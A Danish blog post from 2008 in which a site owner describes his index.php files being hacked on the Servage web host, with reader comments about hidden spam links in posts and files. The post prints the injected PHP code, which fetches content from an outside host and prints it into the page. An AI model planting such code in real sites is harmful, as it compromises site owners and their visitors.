Så er vi kommet noget videre i sagen. Frank som har skrevet en kommentar spottede meget sent i nat, at vi begge bruger Servage som webhost og det var faktisk bare det stikord der skulle til. Efter en del googling og analysering af filer på mine sites, så er der nu ingen tvivl om, at jeg er blevet hacked (det samme gælder for Frank). Well, faktisk er det ikke 100% sikkert, at det er os der er blevet hacked – det er mere sandsynligt at det er selve serveren, hvor vi har vores domæner liggende.
Logger man ind i Servage kontrolpanel, så kan man ikke selv se sit indtastede kortnummer (kun de fire sidste cifre), så det er ikke den vej hackerne har fået adgang. Det bestyrke også mistanken om, at det er selve serveren der er blevet hacked og at "de" derfor har haft adgang til meget mere følsom data.
Ydermere så har Servage forbedret deres sikkerhed, ved dels at have ændret reglerne omkring passwords og dels ved at have installeret et såkaldt CAPTCHA-system d. 21. juni 2008. Begge forbedringer er sket relativt kort efter, at der har været meldinger om, at Servage igen er blevet hacked. 
En anden "sjov" ting er, at jeg ringede til politiet (Station Amager) for at høre noget omkring en anmeldelse af det hele (vel at mærke før jeg vidst, at der var tale om Servage). Personen jeg talte med kunne ikke lige umiddelbart fortælle om det var noget jeg kunne anmelde eller om det var noget som skulle ske gennem banken. Han ringede derfor tilbage lidt senere og fortalte, at såfremt jeg ikke fysisk havde mistet mit kort, så var det ikke noget jeg kunne anmelde. Så det er op til min bank/PBS at gå videre den vej, hvis de vil det.
Frank har også ringet til politiet (Station City) og her fik de at vide, at det da helt klart kan (og skal) anmeldes – længere er den sag ikke.
Såeh… Er der virkelig så meget forskel i uddannelsen af Danmarks politi på Amager og på Halmtorvet?
En lille liste over hvad jeg lige umiddelbart kunne finde omkring dette:
15. februar 2008: Ændrede filer på Servage
7. marts 2008: Servage hacked: Exploit-Iframe (Trojan) Infection
26. marts 2008: Today I ended my Servage problems
18. maj 2008: Servage got hacked again
30. maj 2008: GoodBye Servage!
21. juni 2008: Servage angrebet – tjek dine index.php filer
Var der nogen der sagde ny webhost? 
Følgende indhold er mere teknisk og viser blot hvad der kendertegner det der er sket.
Mine index.php-filer er blevet ændret på to måder. Den ene er en total erstatnig af filen til:
if (extension_loaded("curl")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, "http://100500.muchcool.info/inc.php?767");
$r = curl_exec($ch);
curl_close($ch);
} else { $r=implode("",file("http://100500.muchcool.info/inc.php?767")); }
if($r) print $r;
… som henter nedenstående information:
Heldigvis havde det site hvor ovenstående index.php-fil blev lavet også en default.php-fil, som indeholdte den rigtige startside. Der er med andre ord ikke gået noget kode tabt.
Den anden er en tilføjelse af links til den eksisterende index.php-fil:
Listen er kortet betydeligt ned og linksne variere fra index.php-fil til index.php-fil.
I begge tilfælde er det relativt harmløst – faktisk er der blot indsat nogle links, som andre person ikke engang kan se. Spørgsmålet er bare, hvad har de ellers fået fat i følsomme data? Egentlig behøver der ikke være tale om en og samme person! Som der åbenbart ser ud, så er Servage hullet som en si, så det er jo nærmest gud og hver mand, der kan skaffe sig adgang til serverne. 
Relaterede blogindlæg:
- Brikkerne falder på plads omkring servage.net Min søster skrev til mig her til aften om, at...
- Nyt domæne… igen! Lige så godt som Dreamhost ser ud på papiret, lige...
- Risteriet igen igen :) I dag var Terje og jeg på risteriet til en...
- Hacked! :( Som det pt. vil kunnes ses på http://joles.dk/genes så har...
- Udviklingsforløb Sigurds udviklingsforløb de første 5 år: 2008-11 Kalder, lytter og...
9 Responses to “Servage er blevet hacked… igen… igen…”
24. August 2008 20:37:53
Jeg sad lige og kiggede nogle af mine egne sider og comments igennem. Mange har fået indsat links til noget knowledge storage dot com med alle mulige emner.
Kim Larsens last blog post..Housewarming – part two + three
24. August 2008 22:10:41
Har du kigget dine .htaccess-filer igennem også?
De filer der bliver ramt er oftest "index.php", ".htaccess" og i wordpress "wp-blog-header.php" (fandt jeg ud af for en uges tid siden).
24. August 2008 22:13:45
Det her var direkte i indlæggene (i databasen) og det var stylet så man ikke umiddelbart kan se det, men kun i kilden. Lidt underlig fremgang, men kan give henvisninger og derved øge deres score i google.
Kim Larsens last blog post..Housewarming – part two + three
24. August 2008 22:53:52
Men blev indlægget ikke tagget som spam i første omgang?
Har du et eksempel liggende eller har du nakket det?
24. August 2008 23:01:16
Jeg har nakket det (håber jeg) men her er fra Googles chached side.
save dna
24. August 2008 23:02:05
hmm, jeg kunne åbenbart ikke lige smide det ind som kode, måske brugte jeg forkert tag omkring.
Kim Larsens last blog post..Housewarming – part two + three
24. August 2008 23:23:49
Så det var en kommentar som ikke var blevet markeret som spam?
25. August 2008 11:57:33
Nej havde det bare været det.
Det her var inde i mine egne indlæg og på et par af de static pages. Hovedsageligt enten i starten eller i slutningen af et indlæg, men et par gange midt i indlægget. Jeg kunne ikke rette det i WYSISWYG editoren i WP men skulle bruge code / html for at se det. Jeg kunne også se det direkte i databasen.
25. August 2008 21:41:12
Meget skummelt… Den slags har jeg ikke selv opdaget, så det kan da godt være at jeg lige skal kigge min egen database igennem
Care to comment?
Subscribe to comments?